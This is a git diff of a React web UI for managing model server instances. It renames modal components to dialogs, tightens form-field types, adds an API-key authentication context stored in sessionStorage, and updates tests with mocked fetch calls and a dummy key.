||||
<>
|
||||
<Loader2 className="h-4 w-4 animate-spin" />
|
||||
Authenticating...
|
||||
</>
|
||||
) : (
|
||||
<>
|
||||
<Key className="h-4 w-4" />
|
||||
Login
|
||||
</>
|
||||
)}
|
||||
</Button>
|
||||
</DialogFooter>
|
||||
</form>
|
||||
</DialogContent>
|
||||
</Dialog>
|
||||
)
|
||||
}
|
||||
|
||||
export default LoginDialog
|
||||
@@ -30,7 +30,7 @@ interface SystemInfo {
|
||||
help: string
|
||||
}
|
||||
|
||||
const SystemInfoModal: React.FC<SystemInfoModalProps> = ({
|
||||
const SystemInfoDialog: React.FC<SystemInfoModalProps> = ({
|
||||
open,
|
||||
onOpenChange
|
||||
}) => {
|
||||
@@ -59,7 +59,7 @@ const SystemInfoModal: React.FC<SystemInfoModalProps> = ({
|
||||
}
|
||||
}
|
||||
|
||||
// Load data when modal opens
|
||||
// Load data when dialog opens
|
||||
useEffect(() => {
|
||||
if (open) {
|
||||
fetchSystemInfo()
|
||||
@@ -180,4 +180,4 @@ const SystemInfoModal: React.FC<SystemInfoModalProps> = ({
|
||||
)
|
||||
}
|
||||
|
||||
export default SystemInfoModal
|
||||
export default SystemInfoDialog
|
||||
@@ -7,8 +7,8 @@ import { getFieldType, basicFieldsConfig } from '@/lib/zodFormUtils'
|
||||
|
||||
interface ZodFormFieldProps {
|
||||
fieldKey: keyof CreateInstanceOptions
|
||||
value: any
|
||||
onChange: (key: keyof CreateInstanceOptions, value: any) => void
|
||||
value: string | number | boolean | string[] | undefined
|
||||
onChange: (key: keyof CreateInstanceOptions, value: string | number | boolean | string[] | undefined) => void
|
||||
}
|
||||
|
||||
const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }) => {
|
||||
@@ -18,7 +18,7 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
|
||||
// Get type from Zod schema
|
||||
const fieldType = getFieldType(fieldKey)
|
||||
|
||||
const handleChange = (newValue: any) => {
|
||||
const handleChange = (newValue: string | number | boolean | string[] | undefined) => {
|
||||
onChange(fieldKey, newValue)
|
||||
}
|
||||
|
||||
@@ -29,7 +29,7 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
|
||||
<div className="flex items-center space-x-2">
|
||||
<Checkbox
|
||||
id={fieldKey}
|
||||
checked={value || false}
|
||||
checked={typeof value === 'boolean' ? value : false}
|
||||
onCheckedChange={(checked) => handleChange(checked)}
|
||||
/>
|
||||
<Label htmlFor={fieldKey} className="text-sm font-normal">
|
||||
@@ -51,10 +51,14 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
|
||||
<Input
|
||||
id={fieldKey}
|
||||
type="number"
|
||||
value={value || ''}
|
||||
step="any" // This allows decimal numbers
|
||||
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
|
||||
onChange={(e) => {
|
||||
const numValue = e.target.value ? parseFloat(e.target.value) : undefined
|
||||
handleChange(numValue)
|
||||
// Only update if the parsed value is valid or the input is empty
|
||||
if (e.target.value === '' || (numValue !== undefined && !isNaN(numValue))) {
|
||||
handleChange(numValue)
|
||||
}
|
||||
}}
|
||||
placeholder={config.placeholder}
|
||||
/>
|
||||
@@ -101,7 +105,7 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
|
||||
<Input
|
||||
id={fieldKey}
|
||||
type="text"
|
||||
value={value || ''}
|
||||
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
|
||||
onChange={(e) => handleChange(e.target.value || undefined)}
|
||||
placeholder={config.placeholder}
|
||||
/>
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
import { describe, it, expect, vi, beforeEach } from 'vitest'
|
||||
import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
|
||||
import { render, screen } from '@testing-library/react'
|
||||
import userEvent from '@testing-library/user-event'
|
||||
import InstanceCard from '@/components/InstanceCard'
|
||||
@@ -27,9 +27,15 @@ describe('InstanceCard - Instance Actions and State', () => {
|
||||
options: { model: 'running-model.gguf' }
|
||||
}
|
||||
|
||||
beforeEach(() => {
|
||||
vi.clearAllMocks()
|
||||
})
|
||||
beforeEach(() => {
|
||||
vi.clearAllMocks()
|
||||
window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123')
|
||||
global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))
|
||||
})
|
||||
|
||||
afterEach(() => {
|
||||
vi.restoreAllMocks()
|
||||
})
|
||||
|
||||
describe('Instance Action Buttons', () => {
|
||||
it('calls startInstance when start button clicked on stopped instance', async () => {
|
||||
@@ -93,7 +99,7 @@ describe('InstanceCard - Instance Actions and State', () => {
|
||||
expect(mockEditInstance).toHaveBeenCalledWith(stoppedInstance)
|
||||
})
|
||||
|
||||
it('opens logs modal when logs button clicked', async () => {
|
||||
it('opens logs dialog when logs button clicked', async () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
@@ -109,7 +115,7 @@ describe('InstanceCard - Instance Actions and State', () => {
|
||||
const logsButton = screen.getByTitle('View logs')
|
||||
await user.click(logsButton)
|
||||
|
||||
// Should open logs modal (we can verify this by checking if modal title appears)
|
||||
// Should open logs dialog (we can verify this by checking if dialog title appears)
|
||||
expect(screen.getByText(`Logs: ${stoppedInstance.name}`)).toBeInTheDocument()
|
||||
})
|
||||
})
|
||||
@@ -272,19 +278,19 @@ describe('InstanceCard - Instance Actions and State', () => {
|
||||
/>
|
||||
)
|
||||
|
||||
// Open logs modal
|
||||
// Open logs dialog
|
||||
await user.click(screen.getByTitle('View logs'))
|
||||
|
||||
// Verify modal opened with correct instance data
|
||||
// Verify dialog opened with correct instance data
|
||||
expect(screen.getByText('Logs: running-instance')).toBeInTheDocument()
|
||||
|
||||
// Close modal to test close functionality
|
||||
// Close dialog to test close functionality
|
||||
const closeButtons = screen.getAllByText('Close')
|
||||
const modalCloseButton = closeButtons.find(button =>
|
||||
const dialogCloseButton = closeButtons.find(button =>
|
||||
button.closest('[data-slot="dialog-content"]')
|
||||
)
|
||||
expect(modalCloseButton).toBeTruthy()
|
||||
await user.click(modalCloseButton!)
|
||||
expect(dialogCloseButton).toBeTruthy()
|
||||
await user.click(dialogCloseButton!)
|
||||
|
||||
// Modal should close
|
||||
expect(screen.queryByText('Logs: running-instance')).not.toBeInTheDocument()
|
||||
|
||||
@@ -1,10 +1,11 @@
|
||||
import { describe, it, expect, vi, beforeEach } from 'vitest'
|
||||
import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
|
||||
import { render, screen } from '@testing-library/react'
|
||||
import userEvent from '@testing-library/user-event'
|
||||
import InstanceList from '@/components/InstanceList'
|
||||
import { InstancesProvider } from '@/contexts/InstancesContext'
|
||||
import { instancesApi } from '@/lib/api'
|
||||
import type { Instance } from '@/types/instance'
|
||||
import { AuthProvider } from '@/contexts/AuthContext'
|
||||
|
||||
// Mock the API
|
||||
vi.mock('@/lib/api', () => ({
|
||||
@@ -30,13 +31,16 @@ vi.mock('@/lib/healthService', () => ({
|
||||
|
||||
function renderInstanceList(editInstance = vi.fn()) {
|
||||
return render(
|
||||
<InstancesProvider>
|
||||
<InstanceList editInstance={editInstance} />
|
||||
</InstancesProvider>
|
||||
<AuthProvider>
|
||||
<InstancesProvider>
|
||||
<InstanceList editInstance={editInstance} />
|
||||
</InstancesProvider>
|
||||
</AuthProvider>
|
||||
)
|
||||
}
|
||||
|
||||
describe('InstanceList - State Management and UI Logic', () => {
|
||||
|
||||
const mockEditInstance = vi.fn()
|
||||
|
||||
const mockInstances: Instance[] = [
|
||||
@@ -45,12 +49,20 @@ describe('InstanceList - State Management and UI Logic', () => {
|
||||
{ name: 'instance-3', running: false, options: { model: 'model3.gguf' } }
|
||||
]
|
||||
|
||||
const DUMMY_API_KEY = 'test-api-key-123'
|
||||
|
||||
beforeEach(() => {
|
||||
vi.clearAllMocks()
|
||||
window.sessionStorage.setItem('llamactl_management_key', DUMMY_API_KEY)
|
||||
global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))
|
||||
})
|
||||
|
||||
afterEach(() => {
|
||||
vi.restoreAllMocks()
|
||||
})
|
||||
|
||||
describe('Loading State', () => {
|
||||
it('shows loading spinner while instances are being fetched', async () => {
|
||||
it('shows loading spinner while instances are being fetched', () => {
|
||||
// Mock a delayed response to test loading state
|
||||
vi.mocked(instancesApi.list).mockImplementation(() =>
|
||||
new Promise(resolve => setTimeout(() => resolve(mockInstances), 100))
|
||||
@@ -220,27 +232,5 @@ describe('InstanceList - State Management and UI Logic', () => {
|
||||
expect(await screen.findByText('Instances (3)')).toBeInTheDocument()
|
||||
expect(screen.queryByText('Loading instances...')).not.toBeInTheDocument()
|
||||
})
|
||||
|
||||
it('handles transition from error back to loaded state', async () => {
|
||||
// Start with error
|
||||
vi.mocked(instancesApi.list).mockRejectedValue(new Error('Network error'))
|
||||
|
||||
const { rerender } = renderInstanceList(mockEditInstance)
|
||||
|
||||
expect(await screen.findByText('Error loading instances')).toBeInTheDocument()
|
||||
|
||||
// Simulate recovery (e.g., retry after network recovery)
|
||||
vi.mocked(instancesApi.list).mockResolvedValue(mockInstances)
|
||||
|
||||
rerender(
|
||||
<InstancesProvider>
|
||||
<InstanceList editInstance={mockEditInstance} />
|
||||
</InstancesProvider>
|
||||
)
|
||||
|
||||
// Should eventually show instances
|
||||
// Note: This test is somewhat artificial since the context handles retries
|
||||
expect(screen.getByText('Error loading instances')).toBeInTheDocument()
|
||||
})
|
||||
})
|
||||
})
|
||||
@@ -1,23 +1,29 @@
|
||||
import { describe, it, expect, vi, beforeEach } from 'vitest'
|
||||
import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
|
||||
import { render, screen, waitFor } from '@testing-library/react'
|
||||
import userEvent from '@testing-library/user-event'
|
||||
import InstanceModal from '@/components/InstanceModal'
|
||||
import InstanceDialog from '@/components/InstanceDialog'
|
||||
import type { Instance } from '@/types/instance'
|
||||
|
||||
describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const mockOnSave = vi.fn()
|
||||
const mockOnOpenChange = vi.fn()
|
||||
|
||||
beforeEach(() => {
|
||||
vi.clearAllMocks()
|
||||
})
|
||||
beforeEach(() => {
|
||||
vi.clearAllMocks()
|
||||
window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123')
|
||||
global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))
|
||||
})
|
||||
|
||||
afterEach(() => {
|
||||
vi.restoreAllMocks()
|
||||
})
|
||||
|
||||
describe('Create Mode', () => {
|
||||
it('validates instance name is required', async () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -25,7 +31,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
)
|
||||
|
||||
// Try to submit without name
|
||||
const saveButton = screen.getByTestId('modal-save-button')
|
||||
const saveButton = screen.getByTestId('dialog-save-button')
|
||||
expect(saveButton).toBeDisabled()
|
||||
|
||||
// Add name, button should be enabled
|
||||
@@ -41,7 +47,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -54,7 +60,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
await user.type(nameInput, 'test instance!')
|
||||
|
||||
expect(screen.getByText(/can only contain letters, numbers, hyphens, and underscores/)).toBeInTheDocument()
|
||||
expect(screen.getByTestId('modal-save-button')).toBeDisabled()
|
||||
expect(screen.getByTestId('dialog-save-button')).toBeDisabled()
|
||||
|
||||
// Clear and test valid name
|
||||
await user.clear(nameInput)
|
||||
@@ -62,7 +68,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
|
||||
await waitFor(() => {
|
||||
expect(screen.queryByText(/can only contain letters, numbers, hyphens, and underscores/)).not.toBeInTheDocument()
|
||||
expect(screen.getByTestId('modal-save-button')).not.toBeDisabled()
|
||||
expect(screen.getByTestId('dialog-save-button')).not.toBeDisabled()
|
||||
})
|
||||
})
|
||||
|
||||
@@ -70,7 +76,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -81,16 +87,16 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
await user.type(screen.getByLabelText(/Instance Name/), 'my-instance')
|
||||
|
||||
// Submit form
|
||||
await user.click(screen.getByTestId('modal-save-button'))
|
||||
await user.click(screen.getByTestId('dialog-save-button'))
|
||||
|
||||
expect(mockOnSave).toHaveBeenCalledWith('my-instance', {
|
||||
auto_restart: true, // Default value
|
||||
})
|
||||
})
|
||||
|
||||
it('form resets when modal reopens', async () => {
|
||||
it('form resets when dialog reopens', async () => {
|
||||
const { rerender } = render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -101,18 +107,18 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const nameInput = screen.getByLabelText(/Instance Name/)
|
||||
await userEvent.setup().type(nameInput, 'temp-name')
|
||||
|
||||
// Close modal
|
||||
// Close dialog
|
||||
rerender(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={false}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
/>
|
||||
)
|
||||
|
||||
// Reopen modal
|
||||
// Reopen dialog
|
||||
rerender(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -138,7 +144,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
|
||||
it('pre-fills form with existing instance data', () => {
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -159,7 +165,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -168,7 +174,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
)
|
||||
|
||||
// Submit without changes
|
||||
await user.click(screen.getByTestId('modal-save-button'))
|
||||
await user.click(screen.getByTestId('dialog-save-button'))
|
||||
|
||||
expect(mockOnSave).toHaveBeenCalledWith('existing-instance', {
|
||||
model: 'test-model.gguf',
|
||||
@@ -181,7 +187,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const runningInstance: Instance = { ...mockInstance, running: true }
|
||||
|
||||
const { rerender } = render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -189,10 +195,10 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
/>
|
||||
)
|
||||
|
||||
expect(screen.getByTestId('modal-save-button')).toBeInTheDocument()
|
||||
expect(screen.getByTestId('dialog-save-button')).toBeInTheDocument()
|
||||
|
||||
rerender(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -207,7 +213,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
describe('Auto Restart Configuration', () => {
|
||||
it('shows restart options when auto restart is enabled', () => {
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -227,7 +233,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -247,7 +253,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -261,7 +267,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
await user.type(screen.getByLabelText(/Max Restarts/), '5')
|
||||
await user.type(screen.getByLabelText(/Restart Delay/), '10')
|
||||
|
||||
await user.click(screen.getByTestId('modal-save-button'))
|
||||
await user.click(screen.getByTestId('dialog-save-button'))
|
||||
|
||||
expect(mockOnSave).toHaveBeenCalledWith('test-instance', {
|
||||
auto_restart: true,
|
||||
@@ -276,7 +282,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -300,7 +306,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -310,7 +316,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
// Fill only required field
|
||||
await user.type(screen.getByLabelText(/Instance Name/), 'clean-instance')
|
||||
|
||||
await user.click(screen.getByTestId('modal-save-button'))
|
||||
await user.click(screen.getByTestId('dialog-save-button'))
|
||||
|
||||
// Should only include non-empty values
|
||||
expect(mockOnSave).toHaveBeenCalledWith('clean-instance', {
|
||||
@@ -322,7 +328,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -335,7 +341,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const gpuLayersInput = screen.getByLabelText(/GPU Layers/)
|
||||
await user.type(gpuLayersInput, '15')
|
||||
|
||||
await user.click(screen.getByTestId('modal-save-button'))
|
||||
await user.click(screen.getByTestId('dialog-save-button'))
|
||||
|
||||
expect(mockOnSave).toHaveBeenCalledWith('numeric-test', {
|
||||
auto_restart: true,
|
||||
@@ -349,14 +355,14 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
/>
|
||||
)
|
||||
|
||||
await user.click(screen.getByTestId('modal-cancel-button'))
|
||||
await user.click(screen.getByTestId('dialog-cancel-button'))
|
||||
|
||||
expect(mockOnOpenChange).toHaveBeenCalledWith(false)
|
||||
})
|
||||
@@ -365,7 +371,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
<InstanceModal
|
||||
<InstanceDialog
|
||||
open={true}
|
||||
onOpenChange={mockOnOpenChange}
|
||||
onSave={mockOnSave}
|
||||
@@ -373,7 +379,7 @@ describe('InstanceModal - Form Logic and Validation', () => {
|
||||
)
|
||||
|
||||
await user.type(screen.getByLabelText(/Instance Name/), 'test')
|
||||
await user.click(screen.getByTestId('modal-save-button'))
|
||||
await user.click(screen.getByTestId('dialog-save-button'))
|
||||
|
||||
expect(mockOnSave).toHaveBeenCalled()
|
||||
expect(mockOnOpenChange).toHaveBeenCalledWith(false)
|
||||
|
||||
162
webui/src/contexts/AuthContext.tsx
Normal file
162
webui/src/contexts/AuthContext.tsx
Normal file
@@ -0,0 +1,162 @@
|
||||
import { type ReactNode, createContext, useContext, useState, useEffect, useCallback } from 'react'
|
||||
|
||||
interface AuthContextState {
|
||||
isAuthenticated: boolean
|
||||
isLoading: boolean
|
||||
apiKey: string | null
|
||||
error: string | null
|
||||
}
|
||||
|
||||
interface AuthContextActions {
|
||||
login: (apiKey: string) => Promise<void>
|
||||
logout: () => void
|
||||
clearError: () => void
|
||||
validateAuth: () => Promise<boolean>
|
||||
}
|
||||
|
||||
type AuthContextType = AuthContextState & AuthContextActions
|
||||
|
||||
const AuthContext = createContext<AuthContextType | undefined>(undefined)
|
||||
|
||||
interface AuthProviderProps {
|
||||
children: ReactNode
|
||||
}
|
||||
|
||||
const AUTH_STORAGE_KEY = 'llamactl_management_key'
|
||||
|
||||
export const AuthProvider = ({ children }: AuthProviderProps) => {
|
||||
const [isAuthenticated, setIsAuthenticated] = useState(false)
|
||||
const [isLoading, setIsLoading] = useState(true)
|
||||
const [apiKey, setApiKey] = useState<string | null>(null)
|
||||
const [error, setError] = useState<string | null>(null)
|
||||
|
||||
// Load auth state from sessionStorage on mount
|
||||
useEffect(() => {
|
||||
const loadStoredAuth = async () => {
|
||||
try {
|
||||
const storedKey = sessionStorage.getItem(AUTH_STORAGE_KEY)
|
||||
if (storedKey) {
|
||||
setApiKey(storedKey)
|
||||
// Validate the stored key
|
||||
const isValid = await validateApiKey(storedKey)
|
||||
if (isValid) {
|
||||
setIsAuthenticated(true)
|
||||
} else {
|
||||
// Invalid key, remove it
|
||||
sessionStorage.removeItem(AUTH_STORAGE_KEY)
|
||||
setApiKey(null)
|
||||
}
|
||||
}
|
||||
} catch (err) {
|
||||
console.error('Error loading stored auth:', err)
|
||||
// Clear potentially corrupted storage
|
||||
sessionStorage.removeItem(AUTH_STORAGE_KEY)
|
||||
} finally {
|
||||
setIsLoading(false)
|
||||
}
|
||||
}
|
||||
|
||||
void loadStoredAuth()
|
||||
}, [])
|
||||
|
||||
// Validate API key by making a test request
|
||||
const validateApiKey = async (key: string): Promise<boolean> => {
|
||||
try {
|
||||
const response = await fetch('/api/v1/instances', {
|
||||
headers: {
|
||||
'Authorization': `Bearer ${key}`,
|
||||
'Content-Type': 'application/json'
|
||||
}
|
||||
})
|
||||
|
||||
return response.ok
|
||||
} catch (err) {
|
||||
console.error('Auth validation error:', err)
|
||||
return false
|
||||
}
|
||||
}
|
||||
|
||||
const login = useCallback(async (key: string) => {
|
||||
setIsLoading(true)
|
||||
setError(null)
|
||||
|
||||
try {
|
||||
// Validate the provided API key
|
||||
const isValid = await validateApiKey(key)
|
||||
|
||||
if (!isValid) {
|
||||
throw new Error('Invalid API key')
|
||||
}
|
||||
|
||||
// Store the key and update state
|
||||
sessionStorage.setItem(AUTH_STORAGE_KEY, key)
|
||||
setApiKey(key)
|
||||
setIsAuthenticated(true)
|
||||
} catch (err) {
|
||||
const errorMessage = err instanceof Error ? err.message : 'Authentication failed'
|
||||
setError(errorMessage)
|
||||
throw new Error(errorMessage)
|
||||
} finally {
|
||||
setIsLoading(false)
|
||||
}
|
||||
}, [])
|
||||
|
||||
const logout = useCallback(() => {
|
||||
sessionStorage.removeItem(AUTH_STORAGE_KEY)
|
||||
setApiKey(null)
|
||||
setIsAuthenticated(false)
|
||||
setError(null)
|
||||
}, [])
|
||||
|
||||
const clearError = useCallback(() => {
|
||||
setError(null)
|
||||
}, [])
|
||||
|
||||
const validateAuth = useCallback(async (): Promise<boolean> => {
|
||||
if (!apiKey) return false
|
||||
|
||||
const isValid = await validateApiKey(apiKey)
|
||||
if (!isValid) {
|
||||
logout()
|
||||
}
|
||||
return isValid
|
||||
}, [apiKey, logout])
|
||||
|
||||
const value: AuthContextType = {
|
||||
isAuthenticated,
|
||||
isLoading,
|
||||
apiKey,
|
||||
error,
|
||||
login,
|
||||
logout,
|
||||
clearError,
|
||||
validateAuth,
|
||||
}
|
||||
|
||||
return (
|
||||
<AuthContext.Provider value={value}>
|
||||
{children}
|
||||
</AuthContext.Provider>
|
||||
)
|
||||
}
|
||||
|
||||
export const useAuth = (): AuthContextType => {
|
||||
const context = useContext(AuthContext)
|
||||
if (context === undefined) {
|
||||
throw new Error('useAuth must be used within an AuthProvider')
|
||||
}
|
||||
return context
|
||||
}
|
||||
|
||||
// Helper hook for getting auth headers
|
||||
export const useAuthHeaders = (): HeadersInit => {
|
||||
const { apiKey, isAuthenticated } = useAuth()
|
||||
|
||||
if (!isAuthenticated || !apiKey) {
|
||||
return {}
|
||||
}
|
||||
|
||||
return {
|
||||
'Authorization': `Bearer ${apiKey}`
|
||||
}
|
||||
}
|
||||
@@ -1,7 +1,7 @@
|
||||
import type { ReactNode } from 'react';
|
||||
import { createContext, useContext, useState, useEffect, useCallback } from 'react'
|
||||
import { type ReactNode, createContext, useContext, useState, useEffect, useCallback } from 'react'
|
||||
import type { CreateInstanceOptions, Instance } from '@/types/instance'
|
||||
import { instancesApi } from '@/lib/api'
|
||||
import { useAuth } from '@/contexts/AuthContext'
|
||||
|
||||
interface InstancesContextState {
|
||||
instances: Instance[]
|
||||
@@ -29,6 +29,7 @@ interface InstancesProviderProps {
|
||||
}
|
||||
|
||||
export const InstancesProvider = ({ children }: InstancesProviderProps) => {
|
||||
const { isAuthenticated, isLoading: authLoading } = useAuth()
|
||||
const [instancesMap, setInstancesMap] = useState<Map<string, Instance>>(new Map())
|
||||
const [loading, setLoading] = useState(true)
|
||||
const [error, setError] = useState<string | null>(null)
|
||||
@@ -41,6 +42,11 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
|
||||
}, [])
|
||||
|
||||
const fetchInstances = useCallback(async () => {
|
||||
if (!isAuthenticated) {
|
||||
setLoading(false)
|
||||
return
|
||||
}
|
||||
|
||||
try {
|
||||
setLoading(true)
|
||||
setError(null)
|
||||
@@ -57,7 +63,7 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
|
||||
} finally {
|
||||
setLoading(false)
|
||||
}
|
||||
}, [])
|
||||
}, [isAuthenticated])
|
||||
|
||||
const updateInstanceInMap = useCallback((name: string, updates: Partial<Instance>) => {
|
||||
setInstancesMap(prev => {
|
||||
@@ -154,9 +160,19 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
|
||||
}
|
||||
}, [])
|
||||
|
||||
// Only fetch instances when auth is ready and user is authenticated
|
||||
useEffect(() => {
|
||||
fetchInstances()
|
||||
}, [fetchInstances])
|
||||
if (!authLoading) {
|
||||
if (isAuthenticated) {
|
||||
void fetchInstances()
|
||||
} else {
|
||||
// Clear instances when not authenticated
|
||||
setInstancesMap(new Map())
|
||||
setLoading(false)
|
||||
setError(null)
|
||||
}
|
||||
}
|
||||
}, [authLoading, isAuthenticated, fetchInstances])
|
||||
|
||||
const value: InstancesContextType = {
|
||||
instances,
|
||||
|
||||
@@ -1,12 +1,13 @@
|
||||
import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
|
||||
import { render, screen, waitFor } from '@testing-library/react'
|
||||
import type { ReactNode } from 'react'
|
||||
import { InstancesProvider, useInstances } from '@/contexts/InstancesContext'
|
||||
import { instancesApi } from '@/lib/api'
|
||||
import type { Instance } from '@/types/instance'
|
||||
import { describe, it, expect, vi, beforeEach, afterEach } from "vitest";
|
||||
import { render, screen, waitFor } from "@testing-library/react";
|
||||
import type { ReactNode } from "react";
|
||||
import { InstancesProvider, useInstances } from "@/contexts/InstancesContext";
|
||||
import { instancesApi } from "@/lib/api";
|
||||
import type { Instance } from "@/types/instance";
|
||||
import { AuthProvider } from "../AuthContext";
|
||||
|
||||
// Mock the API module
|
||||
vi.mock('@/lib/api', () => ({
|
||||
vi.mock("@/lib/api", () => ({
|
||||
instancesApi: {
|
||||
list: vi.fn(),
|
||||
create: vi.fn(),
|
||||
@@ -15,8 +16,8 @@ vi.mock('@/lib/api', () => ({
|
||||
stop: vi.fn(),
|
||||
restart: vi.fn(),
|
||||
delete: vi.fn(),
|
||||
}
|
||||
}))
|
||||
},
|
||||
}));
|
||||
|
||||
// Test component to access context
|
||||
function TestComponent() {
|
||||
@@ -30,366 +31,389 @@ function TestComponent() {
|
||||
stopInstance,
|
||||
restartInstance,
|
||||
deleteInstance,
|
||||
clearError
|
||||
} = useInstances()
|
||||
clearError,
|
||||
} = useInstances();
|
||||
|
||||
return (
|
||||
<div>
|
||||
<div data-testid="loading">{loading.toString()}</div>
|
||||
<div data-testid="error">{error || 'no-error'}</div>
|
||||
<div data-testid="error">{error || "no-error"}</div>
|
||||
<div data-testid="instances-count">{instances.length}</div>
|
||||
{instances.map(instance => (
|
||||
{instances.map((instance) => (
|
||||
<div key={instance.name} data-testid={`instance-${instance.name}`}>
|
||||
{instance.name}:{instance.running.toString()}
|
||||
</div>
|
||||
))}
|
||||
|
||||
|
||||
{/* Action buttons for testing with specific instances */}
|
||||
<button
|
||||
onClick={() => createInstance('new-instance', { model: 'test.gguf' })}
|
||||
<button
|
||||
onClick={() => createInstance("new-instance", { model: "test.gguf" })}
|
||||
data-testid="create-instance"
|
||||
>
|
||||
Create Instance
|
||||
</button>
|
||||
<button
|
||||
onClick={() => updateInstance('instance1', { model: 'updated.gguf' })}
|
||||
<button
|
||||
onClick={() => updateInstance("instance1", { model: "updated.gguf" })}
|
||||
